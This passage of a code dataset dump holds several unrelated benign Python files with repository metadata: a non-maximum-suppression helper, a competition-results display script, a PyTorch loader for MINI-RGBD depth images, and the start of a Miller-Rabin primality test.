\"\"\"\n    # rect = x,y, w, h\n    xx1 = max(rect1[0], rect2[0])\n    yy1 = max(rect1[1], rect2[1])\n    xx2 = min(rect1[0] + rect1[2], rect2[0] + rect2[2])\n    yy2 = min(rect1[1] + rect1[3], rect2[1] + rect2[3])\n    w = max(0, xx2 - xx1 + 1)\n    h = max(0, yy2 - yy1 + 1)\n    return float(w * h) / area\n\n\ndef poly_areas(polys):\n    \"\"\"Calculate the area of each polygon in polys\n\n    :param polys: a list of polygons, each specified by its vertices\n    :type polys: list\n    :return: a list of areas corresponding the list of polygons\n    :rtype: list\n    \"\"\"\n    areas = []\n    for poly in polys:\n        areas.append(cv2.contourArea(np.array(poly, np.int32)))\n    return areas\n\n\ndef poly_compare(poly1, poly2, area):\n    \"\"\"Calculate the ratio of overlap between two polygons and the given area\n\n    :param poly1: polygon specified by its vertices\n    :type poly1: list\n    :param poly2: polygon specified by its vertices\n    :type poly2: list\n    :param area: the area to compare the overlap of poly1 and poly2\n    :type area: float\n    :return: the ratio of overlap of poly1 and poly2 to the area e.g. overlap(poly1, poly2)/area\n    :rtype: float\n    \"\"\"\n    assert area > 0\n    intersection_area = help.polygon_intersection_area([poly1, poly2])\n    return intersection_area/area\n\n\ndef nms(boxes, scores, **kwargs):\n    \"\"\"NMS using Felzenszwalb et al. method\n\n    Adapted from non_max_suppression_slow(boxes, overlapThresh) from\n    `Non-Maximum Suppression for Object Detection in Python `_\n\n    This function is not usually called directly. Instead use :func:`nms.nms.boxes`, :func:`nms.nms.rboxes`,\n    or :func:`nms.nms.polygons` and set `nms_algorithm=nms.felzenszwalb`\n\n    :param boxes: a list of boxes to perform NMS on\n    :type boxes: list\n    :param scores: a list of scores corresponding to boxes\n    :type scores: list\n    :param kwargs: optional keyword parameters (see below)\n    :type kwargs: dict (see below)\n    :return: a list of the indices of the best boxes\n    :rtype: list\n\n    :kwargs:\n\n    - top_k (int): if >0, keep at most top_k picked indices. 
default:0, int\n    - score_threshold (float): the minimum score necessary to be a viable solution, default 0.3, float\n    - nms_threshold (float): the minimum nms value to be a viable solution, default: 0.4, float\n    - compare_function (function): function that accepts two boxes and returns their overlap ratio, this function must\n      accept two boxes and return an overlap ratio between 0 and 1\n    - area_function (function): function used to calculate the area of an element of boxes\n    \"\"\"\n\n    if 'top_k' in kwargs:\n        top_k = kwargs['top_k']\n    else:\n        top_k = 0\n    assert 0 <= top_k\n\n    if 'score_threshold' in kwargs:\n        score_threshold = kwargs['score_threshold']\n    else:\n        score_threshold = 0.3\n    assert 0 < score_threshold\n\n    if 'nms_threshold' in kwargs:\n        nms_threshold = kwargs['nms_threshold']\n    else:\n        nms_threshold = 0.4\n    assert 0 < nms_threshold < 1\n\n    if 'compare_function' in kwargs:\n        compare_function = kwargs['compare_function']\n    else:\n        compare_function = None\n    assert compare_function is not None\n\n    if 'area_function' in kwargs:\n        area_function = kwargs['area_function']\n    else:\n        area_function = None\n    assert area_function is not None\n\n    # if there are no boxes, return an empty list\n    if len(boxes) == 0:\n        return []\n\n    if scores is not None:\n        assert len(scores) == len(boxes)\n\n    # initialize the list of picked indexes\n    pick = []\n\n    # compute the area of the bounding boxes\n    area = area_function(boxes)\n\n    # sort the boxes by score or the bottom-right y-coordinate of the bounding box\n    if scores is not None:\n        # sort the bounding boxes by the associated scores\n        scores = help.get_max_score_index(scores, score_threshold, top_k, False)\n        idxs = np.array(scores, np.int32)[:,1]\n        #idxs = np.argsort(scores)\n    else:\n        # sort the bounding boxes by the bottom-right y-coordinate (y + h, assuming (x, y, w, h) boxes)\n        y2 = np.asarray(boxes)[:,1] + np.asarray(boxes)[:,3]\n        idxs = np.argsort(y2)\n\n    # keep looping while some indexes still remain in the indexes list\n    while len(idxs) > 0:\n        # grab the last index in the indexes list, add the index\n        # value to the list of picked indexes, then initialize\n        # the suppression list (i.e. 
indexes that will be deleted)\n        # using the last index\n        last = len(idxs) - 1\n        i = idxs[last]\n        pick.append(i)\n        suppress = [last]\n\n        # loop over all indexes in the indexes list\n        for pos in range(0, last):\n            # grab the current index\n            j = idxs[pos]\n\n            # compute the ratio of overlap between the two boxes and the area of the second box\n            overlap = compare_function(boxes[i], boxes[j], area[j])\n\n            # if there is sufficient overlap, suppress the current bounding box\n            if overlap > nms_threshold:\n                suppress.append(pos)\n\n        # delete all indexes from the index list that are in the suppression list\n        idxs = np.delete(idxs, suppress)\n\n    # return only the indices of the bounding boxes that were picked\n    return pick\n", "repo_name": "ChenNuode/Runner-tag-tracker--Capstone--", "sub_path": "bigtest/lib/python3.6/site-packages/nms/felzenszwalb.py", "file_name": "felzenszwalb.py", "file_ext": "py", "file_size_in_byte": 6542, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 67, "usage_type": "attribute"}, {"api_name": "nms.helpers.polygon_intersection_area", "line_number": 84, "usage_type": "call"}, {"api_name": "nms.helpers", "line_number": 84, "usage_type": "name"}, {"api_name": "nms.helpers.get_max_score_index", "line_number": 162, "usage_type": "call"}, {"api_name": "nms.helpers", "line_number": 162, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 194, "usage_type": "call"}]}
+{"seq_id": "35491856273", "text": "#colorama allows usage of escape chars on any platform\n#install it with \"pip install colorama\"\n\nCOLORAMA = False\ntry:\n    import colorama\n    from colorama import init,Fore,Back,deinit\n    init()\n    COLORAMA = True\nexcept ImportError:\n    print(\"Working without colorama, no colors available\")\n    \n#file locations, change them here if you want\nRESULTSFILE = \"results.txt\"\nLINEFILE = \"resultsline.txt\"\n\n# Windows key representations\nWIN_UP_ARROW = b'H'\nWIN_DOWN_ARROW = b'P'\nWIN_ENTER = b'\\r' \nWIN_SPACE = b' '\nWIN_SPECIAL_CHAR = b'\\xe0'\nWIN_EXIT = b'\\x03'\n\nLIN_ENTER = '\\r'\nLIN_SPECIAL_CHAR = \"\\x1b\"\nLIN_UP_ARROW = \"A\"\nLIN_DOWN_ARROW = \"B\"\nLIN_SPACE = \" \"\nLIN_EXIT = '\\x03'\n\n\n\n#escape codes for custom behavior in terminal\nCLEAR = '\\033[2J'\nRESETTEXT = '\\033[0m'\nif not COLORAMA:\n    RESETTEXT = ''\n    CLEAR = '\\n\\n\\n\\n\\n'\n\n\ndef main():\n    #get the result info \n    print(CLEAR + \"Getting lines from file.\")\n    compData = open(RESULTSFILE, \"r\")\n    compInfo = compData.readlines()\n    compData.close()\n    \n    \n    #clears the file used \n    clearTextFile()\n    \n    dqMarker = -1\n    num = 0\n\n    print(\"Checking for correct formatting (DQ empty line).\")\n    for compLine in compInfo:\n        num += 1\n        if compLine.strip() == \"\":\n            dqMarker = num\n            break\n    \n    assert dqMarker != -1, \"Empty line not found before DQs! 
Exiting...\"\n\n dqMarker-=1\n \n compInfo.pop(dqMarker)\n compInfo = reverseArray(compInfo, dqMarker)\n \n \n print(\"Ready to start printing info, press Enter to start.\")\n \n print(\"\\nTotal Entrants:\", len(compInfo),\"\\nNon-DQs:\", end=\" \")\n print(dqMarker,\"\\nDQs:\",len(compInfo) - dqMarker)\n \n i=0\n for line in compInfo:\n if i >= dqMarker and COLORAMA:\n print(Back.RED, end=\"\")\n if line.strip() == \"\":\n print(\"(empty line)\", end=\"\")\n print(line.strip() + RESETTEXT)\n i+=1\n \n input()\n print(CLEAR, end=\"\")\n \n startComp(compInfo, dqMarker)\n \n writeTextToResults(\"Thanks for watching!\")\n \n print(CLEAR)\n print(\"Printed 'Thanks for watching!'\\n\\nPress Enter to exit.\")\n input()\n print(CLEAR)\n \n clearTextFile()\n \ndef startComp(compInfo, dqMarker):\n \"\"\"\n loops over the array compInfo, displaying all the results at once\n with the current placing highlighted. Pressing Enter moves on to\n the next placing. All placings after the int dqMarker in the array\n are displayed on a red background to differentiate them.\n \"\"\"\n \n #loop over the array for every entry in it\n currentSpot = 0\n while currentSpot < len(compInfo):\n print(CLEAR, end=\"\")\n #display every entry in the array by looping over it\n i = 0\n for compLine in compInfo:\n \n #replace characters that don't show up in some fonts\n compLine = compLine.replace('“','\"').replace('”','\"').replace(\"’\",\"'\").strip()\n \n #if the line is a DQ display it with a red background\n if i >= dqMarker and COLORAMA:\n print(Back.RED,end=\"\")\n \n # if the current placing is up, display it on a white background with black text\n if i == currentSpot:\n if COLORAMA:\n print(Back.WHITE + Fore.BLACK + \">\", end=\"\")\n else:\n print(\"\\n>>>>\",end=\"\")\n compOutput = compLine\n \n #if it is over the length, cut off some data at the end\n if len(compLine) > 64:\n compOutput = compOutput[:64]\n compOutput = compOutput[:compOutput.rfind(\" \")]\n compOutput += \"...\"\n \n #write output to the line file\n writeTextToResults(compOutput)\n if compLine.strip() == \"\":\n print(\"(Empty line)\",end=\"\")\n #print line and reset text styles\n print(compLine + RESETTEXT)\n i += 1\n \n #wait until the user presses a button to continue\n var = waitForInput()\n if var >= 0:\n currentSpot += var\n elif currentSpot > 0:\n currentSpot += var\n\ndef writeTextToResults(text):\n \"\"\"sets the resultsline file to the inputted text\"\"\"\n compData = open(LINEFILE, \"w\")\n compData.write(text.strip())\n compData.close()\n \ndef clearTextFile():\n \"\"\"clears the results text file\"\"\"\n writeTextToResults(\"\")\n \ndef reverseArray(data, dqMarker):\n \"\"\"\n reverses the contents of the array 'data'\n before the spot marked by the int dqMarker\n \n returns the array after reversing it\n \"\"\"\n print(\"Reversing array\")\n temp = -1\n counter = 0\n \n #iterate through the list until halfway point (not counting dqs)\n #swapping 1st and last to be able to see in reverse order\n while counter < (dqMarker // 2):\n temp = data[counter]\n data[counter] = data[dqMarker - counter - 1]\n data[dqMarker - counter - 1] = temp\n counter += 1\n \n return data\n\ndef waitForInput():\n \"\"\"\n\twaits for valid input, then returns the approximate change\n to currentSpot based on the input. 
Handles Windows and linux.\n\t\"\"\"\n if os_type == \"WIN\":\n c = b''\n while True:\n c = getch()\n if (c == WIN_ENTER):\n return 1\n elif (c == WIN_SPECIAL_CHAR):\n c = getch()\n if (c == WIN_UP_ARROW):\n return -1\n elif (c == WIN_DOWN_ARROW):\n return 1\n elif (c == WIN_EXIT):\n if COLORAMA:\n deinit()\n raise KeyboardInterrupt()\n else:\n c = \"\"\n while True:\n c = getch()\n if c == LIN_EXIT:\n if COLORAMA:\n deinit()\n raise KeyboardInterrupt()\n if c == LIN_ENTER:\n return 1\n if c == LIN_SPECIAL_CHAR:\n getch()\n c = getch()\n if c == LIN_DOWN_ARROW:\n return 1\n if c == LIN_UP_ARROW:\n return -1\n \ndef _find_getch():\n try:\n import termios\n except ImportError:\n # Non-POSIX. Return msvcrt's (Windows') getch.\n import msvcrt\n return msvcrt.getch, \"WIN\"\n\n # POSIX system. Create and return a getch that manipulates the tty.\n import sys, tty\n def _getch():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(fd)\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\n return _getch,\"LIN\"\n\ngetch, os_type = _find_getch()\n \nmain()\n\nif COLORAMA:\n deinit()", "repo_name": "1ted59/Competition-Results", "sub_path": "Competition.py", "file_name": "Competition.py", "file_ext": "py", "file_size_in_byte": 6905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "colorama.init", "line_number": 8, "usage_type": "call"}, {"api_name": "colorama.Back.RED", "line_number": 79, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 79, "usage_type": "name"}, {"api_name": "colorama.Back.RED", "line_number": 120, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 120, "usage_type": "name"}, {"api_name": "colorama.Back.WHITE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 125, "usage_type": "name"}, {"api_name": "colorama.Fore.BLACK", "line_number": 125, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 125, "usage_type": "name"}, {"api_name": "colorama.deinit", "line_number": 201, "usage_type": "call"}, {"api_name": "colorama.deinit", "line_number": 209, "usage_type": "call"}, {"api_name": "msvcrt.getch", "line_number": 227, "usage_type": "attribute"}, {"api_name": "sys.stdin.fileno", "line_number": 232, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 232, "usage_type": "attribute"}, {"api_name": "termios.tcgetattr", "line_number": 233, "usage_type": "call"}, {"api_name": "tty.setraw", "line_number": 235, "usage_type": "call"}, {"api_name": "sys.stdin.read", "line_number": 236, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 236, "usage_type": "attribute"}, {"api_name": "termios.tcsetattr", "line_number": 238, "usage_type": "call"}, {"api_name": "termios.TCSADRAIN", "line_number": 238, "usage_type": "attribute"}, {"api_name": "colorama.deinit", "line_number": 248, "usage_type": "call"}]} +{"seq_id": "36755201264", "text": "import os\nfrom PIL import Image\nimport sys\nfrom concurrent.futures import ProcessPoolExecutor\nimport psutil\nimport time\nimport numpy as np\nimport torch.utils.data\nimport matplotlib.pyplot as plt\n\n\n\n\ndef timing(f):\n def wrap(*args, **kwargs):\n time1 = time.time()\n ret = f(*args, **kwargs)\n time2 = time.time()\n print('{:s} function took {:.3f} ms'.format(f.__name__, time2-time1))\n return ret\n return wrap\n\n\n\nclass MiniRGBD(object):\n class 
Folders:\n        depth = 'depth'\n        rgb = 'rgb'\n        fg_mask = 'fg_mask'\n        joints_2d = 'joints_2Ddep'\n        joints_3d = 'joints_3D'\n        smil_params_folder = 'smil_params' # unused as of yet\n\n    def __init__(self, dirnum):\n        dir = dirnum[0]\n        num = dirnum[1]\n\n        # Save original file paths\n        self._depth_file = os.path.join(dir, MiniRGBD.Folders.depth, 'syn_' + num + '_depth.png')\n        self._rgb_file = os.path.join(dir, MiniRGBD.Folders.rgb, 'syn_' + num + '.png')\n        self._fg_mask_file = os.path.join(dir, MiniRGBD.Folders.fg_mask, 'mask_' + num + '.png')\n        self._joints_2d_file = os.path.join(dir, MiniRGBD.Folders.joints_2d, 'syn_joints_2Ddep_' + num + '.txt')\n        self._joints_3d_file = os.path.join(dir, MiniRGBD.Folders.joints_3d, 'syn_joints_3D_' + num + '.txt')\n\n        # Open images.\n        depth = Image.open(self._depth_file)\n        rgb = Image.open(self._rgb_file)\n        fg = Image.open(self._fg_mask_file)\n        self._bbox = fg.getbbox()\n\n        # Store only the nonzero region.\n        self._fg_mask = fg.crop(self._bbox)\n        self._depth = Image.new(depth.mode, self._fg_mask.size)\n        self._rgb = Image.new(rgb.mode, self._fg_mask.size)\n\n        self._depth.paste(depth.crop(self._bbox), mask=self._fg_mask)\n        self._rgb.paste(rgb.crop(self._bbox), mask=self._fg_mask)\n\n        # Finally, load and store the joint values.\n        def extract_joints(_joints_file):\n            num_joints = 24 # Number of joints annotated in each frame.\n            joints = []\n            with open(_joints_file, 'r') as joints_file:\n                for idx, line in enumerate(joints_file.readlines()):\n                    x, y, z, joint_id = line.split()\n                    x, y, z, joint_id = float(x), float(y), float(z), int(joint_id)\n                    joints.append((x, y, z))\n                    assert (joint_id == idx) # Check that data format is always the same.\n            assert (idx == num_joints) # Make sure that all joints are present.\n            return joints\n\n        # Extract joints values\n        self.joints_2d = extract_joints(self._joints_2d_file)\n        self.joints_3d = extract_joints(self._joints_3d_file)\n\n    @staticmethod\n    def _thumbnail(img, thumbnail_size):\n        # Since thumbnail preserves aspect ratio, its size will be at most thumbnail_size; pad it out to exactly thumbnail_size\n        img = img.copy()\n        img.thumbnail(thumbnail_size, Image.LANCZOS)\n        padded = Image.new(img.mode, thumbnail_size)\n        padded.paste(img,\n                     ((padded.size[0] - img.size[0]) // 2,\n                      (padded.size[1] - img.size[1]) // 2))\n        return padded\n\n    def depth_thumbnail(self, thumbnail_size):\n        return MiniRGBD._thumbnail(self._depth, thumbnail_size)\n\n    def rgb_thumbnail(self, thumbnail_size):\n        return MiniRGBD._thumbnail(self._rgb, thumbnail_size)\n\n    def point_cloud(self):\n        z = np.asarray(Image.open(self._depth_file))\n\n        # From depth_to_3D.py\n        # camera calibration used for generation of depth\n        fx = 588.67905803875317\n        fy = 590.25690113005601\n        cx = 322.22048191353628\n        cy = 237.46785983766890\n\n        # create tuple containing image indices\n        indices = tuple(np.mgrid[:z.shape[0], :z.shape[1]].reshape((2, -1)))\n        pts3D = np.zeros((indices[0].size, 3))\n        pts3D[:, 2] = z[indices].ravel() / 1000.\n        pts3D[:, 0] = (np.asarray(indices).T[:, 1] - cx) * pts3D[:, 2] / fx\n        pts3D[:, 1] = (np.asarray(indices).T[:, 0] - cy) * pts3D[:, 2] / fy\n\n        return pts3D\n\n\nclass MiniDDataset(torch.utils.data.Dataset):\n    def __init__(self, mini_rgbd, thumbnail_size=(128, 128)):\n        self.mini_rgbd = mini_rgbd\n        self.thumbnail_size = thumbnail_size\n\n    def __getitem__(self, index):\n        rgbd = self.mini_rgbd[index]\n        # Currently return depth image with 2d joints\n        img = rgbd.depth_thumbnail(self.thumbnail_size)\n        target = rgbd.joints_2d\n        return img, target\n\n    def __len__(self):\n        return len(self.mini_rgbd)\n\n\n\ndef find_mini_rgbd(path):\n    
datafiles = []\n # Find all data files, given as (path, XXXXX):(str,str), where XXXXX is the number of the image, e.g. syn_XXXXX.png.\n with os.scandir(path) as it:\n for entry in it:\n # Get directories /XX/\n if entry.is_dir() and entry.name.isdigit():\n for file in os.listdir(os.path.join(entry, 'rgb')):\n if file.startswith('syn_') and file.endswith(\".png\") and file[4:9].isdigit():\n datafiles.append((entry.path, file[4:9]))\n return datafiles\n\n\ndef load_mini_rgbd(datafiles):\n # Since we max out the CPU, we lower our priority so the system does not become unresponsive.\n parent = psutil.Process()\n old_priority = parent.nice()\n parent.nice(psutil.BELOW_NORMAL_PRIORITY_CLASS) # (Child processes inherit the niceness value)\n\n # Using multiple CPUs since each can handle a separate file. (Task is CPU-bound on SSD)\n with ProcessPoolExecutor(max_workers=os.cpu_count()) as pool:\n datafiles = pool.map(MiniRGBD, datafiles, chunksize=64)\n parent.nice(old_priority) # Restore process priority.\n sys.stdout.flush() # TODO: Remove this\n return [data for data in datafiles]\n\nimport matplotlib.animation as animation\n\nif __name__ == \"__main__\":\n data_files = find_mini_rgbd(os.path.join('RGBD', 'MINI-RGBD'))\n data_files = load_mini_rgbd(data_files[:2])\n # Now that we have the data (80 seconds load)\n fig, ax = plt.subplots()\n ims = []\n for (img, target) in MiniDDataset(data_files):\n im = plt.imshow(img, animated=True)\n ims.append([im])\n\n ani = animation.ArtistAnimation(fig, ims, interval=1000//30, blit=True,\n repeat_delay=0)\n plt.show()\n\n sys.exit()\n for file in os.listdir(os.path.join('RGBD', 'MINI-RGBD', '01', 'rgb')):\n assert (file.startswith('syn_') and file.endswith(\".png\")) # Check right format.\n int(file[4:9])\n\n sys.exit()\n if file.endswith(\".png\"):\n rgb = Image.open(os.path.join(rgb_dir, file.replace('mask', 'syn')))\n depth = Image.open(os.path.join(depth_dir, file.replace('mask', 'syn').replace('.png', '_depth.png')))\n fg = Image.open(os.path.join(fg_mask_dir, file))\n # Extract foreground and crop to it.\n fgbox = fg.getbbox()\n cropped_depth = Image.composite(depth, Image.new(depth.mode, depth.size), fg).crop(fgbox)\n cropped_rgb = Image.composite(rgb, Image.new(rgb.mode, rgb.size), fg).crop(fgbox)\n\n depth_range = depth.getextrema()\n assert (depth_range[0] != 0)\n\n if not cropped_depth.getbbox() == cropped_rgb.getbbox():\n print(cropped_depth.getbbox() == cropped_rgb.getbbox())\n sys.exit()\n # Resize the image, preserving aspect ratio and pad it out, so it is the same as thumbnail_size\n # cropped.thumbnail(thumbnail_size, Image.LANCZOS)\n # padded = Image.new(cropped.mode, thumbnail_size)\n # padded.paste(cropped,\n # (int((thumbnail_size[0] - cropped.size[0]) / 2),\n # int((thumbnail_size[1] - cropped.size[1]) / 2)))\n\n # Make sure image is square (stackoverflow.com/questions/1386352/pil-thumbnail-and-end-up-with-a-square-image)\n # background.save(\"output.png\")\n\n # rgb.crop(foreground.getbbox())\n sys.exit()\n\n #print([test._bbox for test in datafiles])\n\n#with concurrent.futures.ProcessPoolExecutor() as executor:\n# datafiles = executor.starmap(MiniRGBD, datafiles)\n\n# Store them as a dataset.\n#data_files = [MiniRGBD(dir, num) for (dir, num) in datafiles]\n\n\n\n\n\n\n\n\n\n\n#with open(path, 'rb') as f:", "repo_name": "sebftw/PyTorch", "sub_path": "mini-rgbd.py", "file_name": "mini-rgbd.py", "file_ext": "py", "file_size_in_byte": 8314, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", 
"pt": "61", "api": [{"api_name": "time.time", "line_number": 16, "usage_type": "call"}, {"api_name": "time.time", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 46, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 46, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 47, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 47, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 48, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 48, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 53, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 53, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 54, "usage_type": "name"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 80, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 80, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 81, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 81, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 94, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 94, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 94, "usage_type": "name"}, {"api_name": "numpy.mgrid", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.utils.data.utils", "line_number": 113, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 113, "usage_type": "name"}, {"api_name": "os.scandir", "line_number": 133, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path", "line_number": 137, "usage_type": "attribute"}, {"api_name": "psutil.Process", "line_number": 145, "usage_type": "call"}, {"api_name": "psutil.BELOW_NORMAL_PRIORITY_CLASS", "line_number": 147, "usage_type": "attribute"}, {"api_name": "concurrent.futures.ProcessPoolExecutor", "line_number": 150, "usage_type": "call"}, {"api_name": "os.cpu_count", "line_number": 150, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 153, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 153, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 162, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.animation.ArtistAnimation", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.animation", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 172, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 177, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 179, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 179, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 180, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 180, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 181, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 181, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "PIL.Image.composite", "line_number": 184, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 184, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 184, "usage_type": "call"}, {"api_name": "PIL.Image.composite", "line_number": 185, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 185, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 185, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 192, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 204, "usage_type": "call"}]} +{"seq_id": "33413634905", "text": "\"\"\"\r\nA python script to perform Miller-Rabin Primality Test and find the strong \r\npseudo primes base 2 up to 10^5.\r\n\r\nNOTE : A python package \"sympy\" is used so please install the package.\r\n\t Steps to import the package : 1. Open command prompt or terminal\r\n\t \t\t\t\t\t\t\t\t 2. 
run \"pip install sympy\"\r\n\r\nThis program is written using Python Version 3\r\n________________________________________________________________________________\r\n\r\n\"\"\"\r\nimport random \r\nimport sympy\r\n\r\nlower = 2 #first number to be tested for prime\r\nupper = pow(10,5) #last number to be tested for prime ie 10^5\r\nk = 4 #number of iteration to be performed\r\n\r\nprime_list = sympy.primerange(lower,upper) # a list of all prime betn 3 and 10^5\r\n\r\nprime_set = set() # a set to hold all primes\r\n\r\n#adding all prime to a set\r\nfor i in prime_list:\r\n\tprime_set.add(i)\r\n \r\n# a function to cal (x^y) % p \r\ndef power(x, y, p): \r\n\t\r\n\tres = 1; # variable to store (x^y) % p \r\n\t\r\n\t# Update x if it is more than or \r\n\t# equal to p \r\n\tx = x % p; \r\n\twhile (y > 0): \r\n\t\t\r\n\t\t# If y is odd, multiply \r\n\t\t# x with result \r\n\t\tif (y & 1): \r\n\t\t\tres = (res * x) % p; #mod operation to keep x in range of p\r\n\t\ty = y>>1; # y = y/2 \r\n\t\tx = (x * x) % p; #mod operation to keep x in range of p\r\n\t\r\n\treturn res; \r\n\r\n#a functio which compute the algo of Raben Miller Test\r\ndef millerTest(d, n): \r\n\t\r\n\ta = 2; # base\r\n\r\n\t# Compute a^d % n \r\n\tx = power(a, d, n); \r\n\r\n\t# if x is 1 or n-1 ie -1 return true\r\n\tif (x == 1 or x == n - 1): \r\n\t\treturn True; \r\n\r\n\t# Iterating\r\n\t# (i) d does not reach n-1 \r\n\t# (ii) (x^2) % n is not 1 \r\n\t# (iii) (x^2) % n is not n-1 \r\n\twhile (d != n - 1): \r\n\t\tx = (x * x) % n; \r\n\t\td *= 2; \r\n\r\n\t\tif (x == 1):\r\n\t\t\t#if x = 1 the n is composite prime \r\n\t\t\treturn False; \r\n\t\tif (x == n - 1): \r\n\t\t\t#if x = n-1 ie -1 then n is probable prime\r\n\t\t\treturn True; \r\n\r\n\t# Return composite \r\n\treturn False; \r\n\r\n# It returns false if n is composite and returns true if n is probably prime. 
